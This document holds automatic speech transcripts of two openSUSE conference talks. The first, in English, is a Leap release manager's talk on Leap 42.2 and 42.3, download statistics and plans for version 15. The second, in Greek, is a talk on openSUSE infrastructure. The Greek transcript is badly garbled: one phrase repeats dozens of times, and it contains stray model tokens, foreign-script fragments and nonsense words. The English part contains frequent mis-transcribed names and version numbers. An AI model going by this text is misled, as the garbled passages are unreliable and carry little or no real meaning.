adopted the factory development process more so it made it easier to get the packages from there. But the first obstacle in development was actually KDE again because this major version update in maintenance caused quite some integration issues in the beginning. That kept me busy for quite a while until SP2 was published and SP2 was huge. So we had a new kernel, a new system, a new GNOME, a new Qt and all of that had to be integrated. So overall more than a thousand packages I think was all but trivial to get LEEP on that state. During the development of SP2, Susie noticed that it's a good idea to take packages from factory because most work was already done there. For example GNOME and 42.1 was slightly newer than in SLEE 12. So they moved to a newer version and SP2 was easier for them. But for that they had to take the packages from factory which had conflicting change lock entries compared to the one in SLEE. That was quite some challenge to figure out the right way to do that. In the end SLEE release management agreed to accept factory change locks without merging old entries in there or somehow mangling change locks. I think there was a big step towards common sources and thanks for that. It was a great compromise from SLEE side. The only condition that we have to fulfill is that we don't lose bug numbers or CD entries in change locks. So every once in a while we see packages that go into factory that only have a change lock change adding bug numbers. If you're a community packageer please accept them. They help us to keep less end factory in sync. So that's from the time of 42.2. What we also got with 42.2 was the leaper bot. It's a bot that helps mostly release management to see which packages come from where. It commands a new request and complains loudly if they are not from factory for example. The release of 42.2 had to be delayed for Plasma. We made a compromise with the KDE team after the conference that we integrate the Plasma 5.8 long-term release into Leap. So for that we had to delay our release and they would move their release date earlier. So with that we could manage to get a long-term supported Plasma as default desktop again. It was a big risk because really we didn't know what the quality of that thing would be. The schedule was very tight. And to the outside it looked like it was released upstream. Then we put it in the distribution and the next day we had it there working and fully tested. But that was not what happened. It was a lot of work behind the scenes weeks and months before. Our KDE team created those live CDs, Argonne and Krypton. They were already tested in OpenKey. So a quite big chunk of integration work and bug fixing was already done via those live CDs. Also Dominic was so kind to accept KDE release candidates in the staging. So normally in factory we only accept the latest stable release from upstream. But as long as KDE is in better on RRC phase it's not a candidate for factory. So let us put it in staging already so we could get the same package that are candidates for factory in Leap and accept them in Leap. So later Leap Beta already had the pre-releases of Plasma. At the release day of Plasma 5.8 it was quite easy to do this minor jump to the final version. So big thanks to the KDE team again for doing that. Also to upstream thanks for making the Plasma long-term service release. And I had no complaints for the default test of 142.2 as far as I know. So great work from everybody. So everyone is interested now in how 142.2 did. I'll put in the graph here. And while you are staring at it I'll drink a bit. So what do we see here? This is the downloads, the download statistics of download OpenSusi.org. Super for every request, sensor UUID with the request. So we know even with changing IP addresses which system downloads packages. And by looking at all reports that are published on download OpenSusi.org we can relate the report with the distribution. So this is not just the official update report but this is all OBS reports. So even if packages built for like 13.2 in their home it would be reflected here. So on the Y-axis we see the number of UUIDs that is the number of active users we have per month. So once the UUID shows up in a third month it's accounted here. On the X-axis we see the time back to 2012. So what else can we see? There are spikes. There are the releases, the release day, where is my mouse? So here is 13.1. This is the release day of 13.2. Here is 42.1 and 42.2. Pretty obvious, 13.2 was big both in terms of release day impact. I don't know what exactly we did on that release day but there was a huge spike in number of users on that day or during the release period and it also got quite some users and a stable user base over time. Another thing that is visible that Tumbleweed really took off. So after 13.2 we gained more and more users in Tumbleweed. There's a huge success compared to before where it was barely visible at all. Now for the not so pleasant things, the spike for 42.1 was quite low. So either we did the wrong marketing or people were not interested in that but for sure it didn't have this huge impact as 13.2. What we can also see at this time, we got more Tumbleweed users at the release day of 42.1. So whatever we do in the press it means we get new users in all distributions. And we see that for 42.2 the release day impact was even smaller. Overall 42.1 didn't really cut into the previous release as previous open-sUSE users. So I guess most open-sUSE users were cautious and didn't want to jump into this new release immediately and stayed with 13.2. And even today we have about one third. Our users are still on 13.2 even though it ran out of maintenance in January. It ran out in January. So that is the other strange thing in this graph. In January suddenly we see a drop of users in 13.2. The explanation might be that we didn't actually lose them but we just can't count them anymore because as soon as 13.2 went out of maintenance the repo wasn't refreshed anymore. So the repo MD data doesn't change. So it likely only does head requests to check if the repo is current but no get requests anymore. So we don't see any requests anymore and all the users that previously refreshed the update repo are gone in this graph. So that's I guess why we have this drop on the right side. Another thing to take into account is IPv6. This graph only counts IPv4 but when looking at the IPv6 statistics of Google we can see that the last one and a half years or two years the adoption rate of IPv6 increased and many users went to IPv6. So part of the reason why this graph is low on the right side might be that users went to IPv6. Again, this is hopeful, wishful thinking and trying to be positive. Nevertheless, the user base of Leap and Tumblebee together is not as big as I would have hoped for. As a consequence of the high number of 13.2 users still I've now enabled the 13.2 upgrade test also in the leap testing for 4.2.3. So we should also make sure that upgrades from 13.2 are smooth to 4.2.3 to accommodate for those that stayed on 13.2. The same goes for 4.2.1. We still pay attention to the 4.2.1 release. I think many users stayed also with 4.2.1 waiting for 4.2.3 just to avoid this jump for one release just to do another upgrade shortly afterwards. So far for the numbers. Let's take a look at the current state. What we are currently working on is 4.2.3. We are aiming for end of July 2017 for the release date. It's based on SLEED 12, SB3, which fortunately is not as big as SB2 was. So it's mostly a refresh and hardware enablement release. That means no new GNOME, no new KDE, well not because of SLEED but because we don't do it, but no new system D, no new QT, everything mostly on the same version. Nevertheless, it's like 400 packages from SLEED alone plus the stuff that comes from factory. What we can also see in 4.2.3 is that SLEED release management takes the factory first policy really serious. So packages that go to SLEED and the version upgrades there first go to factory and then to SLEED or at least at the same time. So that really helps us to develop 4.2.3 in parallel to SB3 and benefit from mutual bug reports for example. So even bugs that come on on LEAP side can be addressed on SLEED side. What also happened is that the LEAP report that we introduced in 4.2.2 is now used on SLEED side internally so SLEED release management also knows when packages diverge from factory for example. Some roadblocks for the development are NDAs. That is mostly an internal thing to solve. Some feature requests have a non-disclosure agreement so cannot be put to the public before a certain date. But since we want to develop in parallel to SLEED that way we lack some packages that we would like to have and test. Also new in the 4.2.3 development is the rolling release process. So we took the tools from Tumbleweed and instead of doing manual snapshots every four weeks or every two weeks or whatever and having fixed deadlines like on Friday you need to submit all your packages to get it on the snapshot on Wednesday. We now do a rolling model and packages are checked in any time when the staging is green. Snapshots are released automatically by OpenQA when it's green. That is pretty nice for me as a release manager because I can call it a day on Friday and I don't have to work on Sunday and our package is the same. But it's also a problem for marketing because we have no milestones anymore so there's no big news in the press. We have to find a solution for that to raise awareness. So far I haven't seen too much 4.2.3 bugs. I don't think we are bug free so I think it's not just not tested enough. Meanwhile, we also reached better phase. That is also not that visible due to this rolling model but Slee is mostly done with its better phase so the base system is quite stable so we can also call it a better phase. So if you are on 4.2.2 for example and just slightly adventurous go to 4.2.3 it's stable enough. Those slides run on 4.2.3. My workstation runs on 4.2.3. So whenever there's a problem I share the pain. What else? It's x8664 only. We do have the port subproject for ARX64 and Power but so far I didn't see much activity and for ARX64 it's open case red so I don't know if anyone takes care. Officially we only have x8664. What's new? We got more than 10,000 packages more than in the previous release so we are at 10,100 now. Tumbleweed is at 11,000. Why do I know that we are above 10,000? I noticed because 10,000 is the quota of OBS so I did a check in, went home and then suddenly OBS didn't build anything, package anymore because I went over the quota so I had to go to the other end and ask him to please lift the quota and let us build more than 10,000 packages in 4.2.3. New is also the desktop selection. Since in 4.2.2 I tried to get rid of enlightenment and Simon complained loudly. We need to find different solutions for this desktop selection dialogue and now have it. It's based on this last role selection. It's not as fancy as the old desktop selection but it fulfills the job and it allows us to treat let's say second tier desktop environments all the same. So instead of having XFCE there for whatever reason and enlightenment there for whatever reason we now have the primary selection, NomenCADE and all the other ones where the role selection custom item. We also got this Python single spec macros in meanwhile. So finally we can put Python modules from factory again into 4.2.3 and all the other new features can be seen in this wiki page but it's empty. So nothing more for me here to report. That also directly leads me to the contribution section for 4.2.3. Please please please fill in this feature page. Because marketing has nothing to talk about. If you put any new package into Leap it's more than 1000 so there must be something new in there. Please mention it in the wiki page. That's where marketing is looking. Also if you implemented some great new things in the existing packages please add it there. Of course please test it. We promised smooth updates from previous releases and that doesn't happen automatically. We need people to test that. We especially need to test on physical hardware. We have open kvm testing and open kvm. But we really need to test on real hardware. Then translations is also a topic to contribute. All of it is meanwhile in web late. Even the desktop files it's really easy for beginners to go there. Just log in as a website, pack your project and start translating. And the custom software selection dialogue needs to be fixed. It still doesn't work as expected for some desktop environments. Also we need desktop environments to actually ship patterns to be visible there. So if you're a maintainer of some second tier desktop environment please create a proper pattern and test it. That it works in the installation process. Then we have software open to the org. That is also still waiting for contributors. It's a Ruby on Rails application. We got a proposal from Richard from more than a year ago. It's in there in some branch, a redesign of the website. But we need to get it live. So we're looking for Ruby on Rails developers to make that happen. If you are one and are interested please approach us so we can set it up. And for our users are the release notes. So if you have any incompatible changes or noteworthy glitches for example please file a pull request on the release notes. Last but not least please do better pizza parties. Even though we don't do better announcements they are quite useful for local communities to get together and try the new release. Maybe get new users. From now on all snapshots are better quality just pick anyone and do your party. So far the current state. Now let's look beyond 42. The next major version is 15. The version number is decided. So the OBS project is created. Feel free to rand about it or be something but won't change anymore. What's going to happen? Slee is going to fork from factory again quite soon. So they have the beta in September already. We are aiming for release in March 2018. So there's not much time left to do major changes in factory. If you have any disruptive changes please do them now. Do them yesterday. It's about time. September is very close. Of course the new slas will have everything new. Stefan Bieler has a talk after mine and he will be more detailed for what he can say what's coming. But for sure we will have a new kernel and you know new system, the new everything. And we will have wayland body fault. A question mark for me is behind KDE. What do we do with KDE? Will they have LTS release again for us? I would like to stay with KDE as default desktop. Please KDE, do your part to make that happen. What I would also like to see in 15 is easier migration. The current way to do migrations in Leap is to modify your reports to a superdub. That's okay for techies but less has a better mechanism. It has a just module so it's really easy to jump from one service back to the next. It would be really nice to have that also in Leap. That would require SCC registration though. So that is something that might be controversial. We're doing a community distribution. Do we really want to have registration and registration keys? I don't know. Maybe we can find a solution. But for sure it would be good to share the code with SLEE. So not invent a separate upgrade method but use the just module that we have in SLEE. Regarding packages, I would like to do an opt out model for 42 packages. That means 15 should include all packages that we had in 42. The maintainers that no longer think that package can be maintained for the next three or four years should then file the delete requests. All the new packages that are coming from Tumbleweed will be opt in just like now. So we may do rounds of automatic submissions but all package maintainers have the option to decline the reviews that gets opened. So that's already my part of this talk. Any questions from the audience? Could someone please bring the microphone? I see on an open QA that there is a test platform for 42.3 juice. Is that actually going to be a product? Yes and no. I think there is no one full time working on that. We would like to see that happening but it currently lacks workforce. So it shouldn't be too hard to get that running. Might be a job for volunteers to just look at it and fix one or two things and get it running. It shouldn't really be hard. But it's not an official delivery. If it is green at the time of release, I'm more than happy to offer it as official part of the release. No more questions? Everyone happy with Leap? No version discussions? Should we release on Friday the 13th? I noticed that 4.3 is also based on Slee. So it's 4.4. That's great if you run it on a server or a bit older hardware. But how about if people want to run it on the latest hardware or let's say the latest network cards or Wi-Fi cards or something like that? So yeah, it's the 4.4 kernel and it's not made for the latest and greatest hardware. But fortunately we share the kernel with Sles. And Sles is not just the server but also Sled, the desktop. And Susie does back parts of drivers to that kernel. So I also saw a separate kernel module package for graphics drivers for example. So there is some hardware enablement in this kernel. I mean we cannot guarantee for everything but there is hardware enablement. And if in doubt of course you can also use 4.2.3 with a new kernel from Tumbleweed if you need to. Good. If there are no more questions, one more thing, we are hiring. So if you want to work for Susie, or close to me, go to Susiecom. We have a fly. So thanks for your attention.
Two 42 version were released (42.1 and 42.2), one is in the works (42.3). Time to recap what we achieved so far, discuss the progress of 42.3 and maybe take a look at what 15 will bring us.
10.5446/54458 (DOI)
Είμαστε ευρωπαίτες, είμαι Τεό, στην άλλη μέρα είναι ο γηκό μου, και συμμετέραντας θα κάνουμε την προστασία για την ευρωπαίτες εμφραστραξία. Πραγματικά, θα μιλήσουμε για τις παιδίες. Ας δούμε κάποιες παιδίες στην εξοδοσύνη. Παρακολουθούμε, πριν θα μιλήσουμε για την εξοδοσύνη. Παρακολουθούμε, πριν θα μιλήσουμε για την εξοδοσύνη. Παρακολουθούμε, πριν θα μιλήσουμε για την εξοδοσύνη. παρακολουθούμε να βλέπετε στα παιδίες. Παρακολουθούμε γιαονευθύνη. Παρακολουθούμε κάποιες παιδίες στο εν περιοδηλό στοιχειδική Потτε, μαζί μας που θα και amigos Αυτό είναι οι ασυνομές που βρήκουν οι ασυνομές. Αυτό είναι το ποιό πιό στις όταν οι ασυνομές δεν βρήκουν οι ασυνομές και έχουμε ένα καλύτερο τελειώμα. Είδατε ένα μικρό κύριο εκεί και εμπανιστράξει να βρεις το κόφι. Αυτό δεν γίνει ασυνομές για εσένας, γιατί οι ασυνομές έχουν 100% ασυνομή και η δημιουργία μας είναι ασυνομή. Έχουμε δύο πιστές πιστές. Τα τέτοια είναι στο πρόβο. Αυτό είναι μέσα από το Σουσέ. Είναι στο κόφι της Παρουσίας. Έχουμε δύο πιστές. Έχουμε δύο μονοσυνομές, μερικές δυνατές, πολλές πιστές δυνατές για δυνατές, για OBS, για OPMQA, για Τσενκίνς, για Cereconsoc, KVM, και πολλές τεραμβάρεις φιβερικών. Το πιστήμα είναι ότι σε τέτοιες χρόνια, υπήρχαν αυσοχές για τα ασυνομές, αλλά αυσοχή, δεν έγινε ασυνομές. Δεν βρήκαμε ασυνομή γιατί πιστές είναι ασυνομές. Και η μας εμπανιστράξη προσπαθεί την τρέντα και εμείς βοηθούν στην Βόψη Φιλωσοφής. Δεν είναι πολύ σημαντικό πως πολλές βιρτσοχές εμπανιστές είναι σήμερα, γιατί εμπανιστράξης εμπανιστράξης είναι δύο. Τώρα που βλέπουμε τα ασυνομές, μπορούμε να δούμε οι άνθρωποι που ασυνομούν τα ασυνομές, και πιστές είναι τα εμπανιστράξης από την Βόψη Φιλωσοφής, που έγινε στην Νερμπέρκη, στον Δησέμβαιο, πριν την Κρισμασία. Έχουμε τρεις εργασίας για δικασία και πολλές εργασίας. Είναι δύο δύο πιο δύο να δημιουργήσουμε τα ασυνομές, για την εργασία ή για την εργασία του εμπανιστράξου. Η στιγμή είναι ότι υπάρχουν πολλές εργασίες, που είναι, για παράδειγμα, δικασίες από τα Βόψη Φιλωσοφής, και δικασίες από τα Βόψη Φιλωσοφής, που είναι δικασίες να εμπανιστράξουν την εργασία. Δεν είναι πολύ εύκολο να δημιουργήσουμε τα ασυνομές. Αν υπάρχει μια εργασία, πρέπει να δούμε, πρέπει να δούμε, σε αυτές τα εργασία, πρέπει να δούμε τα εργασία που εμπανιστράξουν τα ασυνομές. Είναι δικασίες και δικασίες εργασίες, που μπορείς να δούμε τα εργασία, πρέπει να δούμε τα εργασία, που είναι πιο εργασίες, σωστή, εργασίες, και άλλες εργασίες. Βέβαια, υπάρχει η Σουσιαΐτή, και η μικροφόκουσή η ΑΕΤ-τήμ, που είναι δικασίες και δικασίες, ή δικασίες για κάποιες εργασίες, που είναι η ασυνομή. Υπάρχει η ασυνομή εργασία, που είναι δικασίες από κάποιες εργασίες, κάποιες εργασίες, και δικασίες άλλες συμβουλίες, που είναι δικασίες. Και πάνω, αν είναι δικασίες, πρέπει να είναι βολύντεροι, όταν είναι δικασίες. Λοιπόν, θα δώσω τώρα κάποιες εργασίες, αλλά αυτά τα εργασίες είναι πιο... Οι εργασίες είναι πιο σαμπλούς εργασίες, και πρέπει να υπάρχουν πιο πολλές που κάνουν το δικασίες μας. Λοιπόν, έχουμε Κρυστιάν και Σαρα, είναι από τη κοινωνική, είναι κάνουν... Σπωγεραγγερτ. Κρυστιάν και Σαρα, είναι κάνουν το Βικη. Γαρς κάνει όλα. Τορστιάν είναι αυτό το άνθρωπο. Γεια σας, πρόμο. Έχουμε Μαρκούς, που είναι να διδάξει γαρς και να κάνει όλα. Περ από τη κοινωνική, είναι κάνει την Αμμελγκλίστας, έχουμε Δάνια, και από τη κοινωνική. Μαρκς από τη κοινωνική, πιο σαρτή, με βοηθή, με κάποιες πολιτικές αυτοί, λοιπόν, είμαστε μπορούμε να βρήκουμε αξιότητα για να είμαστε αυτοί, γιατί Μαρκς διδάξει το δικασίες. Έχουμε Νιλς, είναι βοηθή με το σοκτικό εμφραστράξο, που έχουμε, Ατριάν και Χένε, βοηθή με το σοκτικό εμφραστράξο. Ρίτσαρτ είναι εδώ, δεν μπορεί να μιλήσει από μας, Δομινίκ, Χαδιλίν Γόγσο, Ωπενκ-Κουαί, και πολλές άλλες πράγματα, και πάνω, είναι να φύγει να φύγει πράγματα για τον ίδιο, γιατί να δώσει τον αξιότητα, να δώσει τον αυτοί. Βουρφιχ είναι βοηθή με το Ωπενκ-Κουαί, και Στεφίδε, και Στεφάν Κουλό, και με το Ωπι-Κουαί, και με το Ωπι-Κουαί, Καλίστιαν Μιουλια είναι ο μόνος μου, και κάνει όλοι. Μαρτίν, από το Πραγόφης, κάνεσαι μονοδιστικές, αλλά, τώρα, είναι να βοηθήσει με μονοδιστικές και άλλες πράγματα. Στανισκλαβι, κάνει το Βεμβλαίδι, Δάνιλ κάνει Τζενκίνδς, Ανκορ είναι ο αυτοίς μας, όταν έχουμε αυτοίς, ο Ανκορ είναι ο αυτοίς μας. Ρουδί, από το Φόρμι, και τώρα από το Βεμβλαίδι, κάνει μεγάλο σημερινό, και άλλες άλλες πράγματα. Μικάι, από το Πρόβο, είναι το μικροφόκουσ, Βεμβλαίδι, και Μιχάγ, που κάνει το Βεμβλαίδι, και τι κάνετε, Μιχάγ, μεγάλο σημερινό. Βεμβλαίδι, και μιχάγ, πράγματα, πράγματα, πράγματα, πράγματα, πράγματα, πράγματα. Βεμβλαίδι, πράγματα, πράγματα, πράγματα, πράγματα, πράγματα, πράγματαстро conservation, frightening, πράγματα, πράγματα, πράγματα, πράγματα, πράγματα, πράγματα, πράγματα, πράγματα techniques, πράγματα, πράγματα, πράγματα, πράγματα, δηλαδή δούμε τα κοινωνία, δούμε τα μοσιασμότητα, δούμε ποιοί τα κοινωνία, δούμε τα κοινωνία και δούμε τα δουλειά που βρήκονται εκεί. Πρώτα θα σας δώσω μικρή δουλειά που χρησιμοποιούμε για δηλαδήες δηλαδήες. Πρώτα είναι το Github σημαντικό για αυτοί που δεν ξέρουν τι είναι Github. Είναι ένα κλόνι της Github που μπορείς να το δείξεις σε την ευρωπαϊκή εμφραστραξία, για να μπορείς να το δείξεις σε την ευρωπαϊκή εμφραστραξία. Είναι το also offers, είναι το own CI protocol, CI application, είναι καλύτερα. Και σε Github στις τώρα έχουμε πολλές εμφραστές, εμφραστές Tata και πιο σημαντικά έχουμε το σωτστακρόπο. Για το σωτστακρόπο θα πω λίγο να πω λίγο λίγο πρόσφυγες, γιατί ξεκινούσαμε με ένα χρόνο με το σωτ, πριν χρησιμοποιούσαμε ένα άλλο κομφιγουλί και το σύστημα. Το σωτ είναι το σύστημα που είναι ένα κομμάτι για εμένα, γιατί αν η ευρωπαϊκή εμφραστραξία δεν είναι στο σωτστακρό, δεν είναι ουφησιακό, δεν θα πρέπει να μην να μην να μην χωρίζει, θα πρέπει να πω λίγο. Πραγματικά, όλοι οι νέοι διευτελίες ή όλοι οι νέοι αδμινιστές, όλοι οι νέοι αδμινιστές που θέλουμε, θα προσπαθούν να το βάζουμε στο σωτστακρό, για να το βάζουμε πραγματικά και να το διευτελίσουμε εύκολο το επόμενο κομμάτι που θέλουμε. Είμαστε χρησιμοποιώντας σε Σιγγα για να μην χρησιμοποιήσουμε. Τώρα, η χρησιμοποιήση για το Άπεν Σουσέ είναι ακόμα προσπαθεί από την ίδια της ίδιας ίδιας, για το ίδιας ίδιας ίδιας ίδιας ίδιας Σιγγή, είναι κάτι που εγώ εγώ εγώ δοκιμάζω, για να εξανασταθεί το μονητορύγωμα από το ίδιας ίδιας ίδιας ίδιας ίδιας. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Και για την τελευταία παρακολουθή, πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιώντας σε εύκολο το Άπεν Σουσέ, για να μην χρησιμοποιήσουμε. Πρώτα, οι δικαίες που οι Άπεν Σουσέ χρησιμοποιούνται. Είμαστε χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε, γιατί θα μην χρησιμοποιήσουμε. Είμαστε χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρώτα, οι δικαίες που έχουν χρησιμοποιήσει, πρέπει να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Πρέπει να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε agreement για να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. να μην χρησιμοποιήσουμε, για να μην χρησιμοποιήσουμε. Μπ ClearHearts,았어اص μπ Cina,ặγγανο Έλεγκη, και οπότε μετά τα διεθνή διεθνή του κοινούς, που συμβείται πως τι συνέβηκε με αυτές τις διεθνές διεθνές ή διεθνές. Είμαστε, φυσικά, να κοιμήσουμε ένα τραγίδιο των πράγματις στο βιβλό μας, που είναι τραγείο στην πλανέτρα Απανσούς Ωρκ, και είναι κατά μας προγράφηση Απανσούς Ωρκ πρόσσοκ. Αλλά για πολύ σημαντικές σχέσεις, χρησιμοποιούμε το νέο Ωρκ Ωπανσούς Ωρκ's website, που καταφέρει τα πιο χρήματα από τα ποιότητα. Είναι τα πιο χρήματα που η Απανσούς Ωρκς Ωρκάς δίνει, και υπάρχουν πολλές χρήματα που η κοινούς Ωρκάς δίνει, και δεν είμαι να μιλήσω όλους τους, θα μιλήσω μόνο από μία πράγματα, μόνο από μία πράγματα. Πρώτα από τα πράγματα που η κοινούς Ωρκάς δίνει, και να μεταφέρει την κοινούς διεθνή, και τα ποιοδοχές και τα πράγματα. Οπότε ό,τι είναι φυσικό, είναι μεταφέρει από τη κοινούς. Δεν θα αλλάξει στον επόμενο, και δεν είμαι πίσω αν θα αλλάξει, δηλαδή, σε αυτό το κλειδί, η Απανσούς Ωρκάς Ωρκάς δίνει, σαν να σημαίνει σαν να σημαίνει, σαν να σημαίνει σαν να σημαίνει, και η κοινούς Ωρκάς δίνει. Έτσι, αυτό είναι ένα πολύ καλό πράγμα, που μπορούμε να βάζουμε ένα σημαντικό λαμμό με αυτό, και να πούμε τι είναι η κοινούς και τι δεν είναι. Οι άλλες πράγματα που η κοινούς Ωρκάς δίνει είναι οι Βακάπ-Απ-Σερβεξι και οι Λαμμόδιοι. Η λαμμόδιση που η Βακάπ-Απ-Σερβεξι είναι ακόμα στη κοινούς Ωρκάς, είναι ότι υπάρχει ένα μονοδοχές με κάποιες δηλαδή, που θα μιλήσω πιο αγγελίτερα. Λοιπόν, πρέπει να σημαίνουμε να διαστηριθούμε τις δηλαδή, αλλά πρέπει πρώτα να διαστηριθούμε ποιες πράγματα που θα είναι πιο αγγελίτερα. Οι δηλαδήες που ήρθαμε πριν, οι δηλαδήες που έχουν δηλαδή, είναι πιο αγγελίτερα, όπως είπαμε, είναι πιο αγγελίτερα, οι τελειοσύντεροι, όπως η QA, και το εξοδοσύντερος εμπανιστικογραμμό, το Φαίδιο Ωρκάς, είναι πιο αγγελίτερα. Είναι πιο αγγελίτερα από κάποιες δηλαδήες, που είναι σε δηλαδή, σε δηλαδή να διαστηριθούμε από το Σουσέ, ή το Μικροφόκουσό ΥΤ, στον Παίρυς Κοινωνικού Δηλαδή. Πρώτα είναι η δηλαδήτητα, η δηλαδήτητα της πραγματικής εμπανιστικός. Το πρόβλημα που είναι πιο αγγελίτερα, είναι ότι υπάρχει ένα μασίν, ένα σημανικό μασίν, που υπάρχει κάποιες δηλαδήες, όταν έχουμε ένα νέο μασίν, υπάρχει κάποιες δηλαδήες, να δούμε αν ο πρόβλημα της μασίνος είναι πραγματικά να διακοπήσει καλό μας. Αυτό το μασίνο είναι πιο αγγελίτερα, και θα υπάρχει πολλή συμβουλία με το σχέδιο μας και όλους τους μασίνους, για να αλλάξει τα πράγματα και τα υπέρασματα για το νέο σκανό μασίνο. Υπάρχει κάποια τραδίσια, δεν είναι ένα τεχνικό σχέδιο, είναι πιο πολιτικό, να πούμε ότι είναι σε προκρόση. Οι εξαιρετικές της δηλαδής, οι ευρώνες εξαιρετικές, οι δεύτεροι εξαιρετικές, οι εξαιρετικές της δηλαδής, οι νέες, οι εξαιρετικές, οι εξαιρετικές που βρήκουν από το μικρόφωρο της ΕΕ, και πριν κάποιες από τα κοινωνικά κοινωνία που έχουν αξιόδηση, έχουν Fair in Provo στοόκλημα εξαιρετικές της valle Και εξαιητικ<|tk|>έ τις διονομιότοιες εξαιρετικές τηςerer STACK Έτσι, οι εξαιρετικές disse είναι στα άσπορε confessed, και εξαιρετικές, λίγες, με ως<|zh|><|transcribe|> τελειο94. είνων Caustic Defense, και ώστε μες και να μην πω ένα τελειώμα που έγινε στον τελειώμα μας. Βέβαια, κάποιες από τα πρόσφανα μας που έγινε στο τελειώμα μας. Το τελειώμα μας ήταν πολύ σημαντικό για εσένας, ειναι η τελειώμα μας για το τελειώμα μας, γιατί ειναι η τελειώμα μας ήταν δημιουργημένη. Είμαστε ριναίμοι, είμαστε ριπραντές από το τελειώμα του Σουσσού, και μία συμβελήση του Σουσού, και πιστεύω ότι γίνουμε δημιουργή στον τελειώμα του Σουσού, και καθώς λάζουμε, ειναι ανταξύπτημα, και ειναι εσάς εσένας, και ειναι εσάς εσένας, και ειναι εσένας, και ειναι εσένας, και ειναι εσένας, και ειναι εσένας, και ειναι εσένας, και ειναι εσένας, και ειναι εσένας, και ειναι εσένας, και μιλήθει για την αμμιλή. Αν αυτό έπρεπε, υπάρχει ένα πιο νέο κοινότητα, κοινότητας που συμβείται στον συμβείο μας και που θα διεθνάται σε δημιουργία. Αυτό που έδωσε ότι όχι όχι όχι οι προσταθείς δεν έδωσε, αυτό που έδωσε ότι οι άνθρωποι έδωσε αυτό το ρημαίμα και έδωσε να καταλαβαίνει τι είναι δύσκολο και έδωσε να καταλαβαίνει τα δύσκολα πρόσταση για να διεθνάται σε δύσκολο. Αυτό ήταν δύσκολο, έδωσε και έχουμε πολλοί νέοι νέοι από την κοινότητα και πολλοί νέοι νέοι από το Σουσέ που συμβείται ευκαιρικά κάνουν δημιουργία και πρόσταση. Από την δύσκολα μας. Αυτό το στιγμό μας είχα δυσκολοί νέοι και 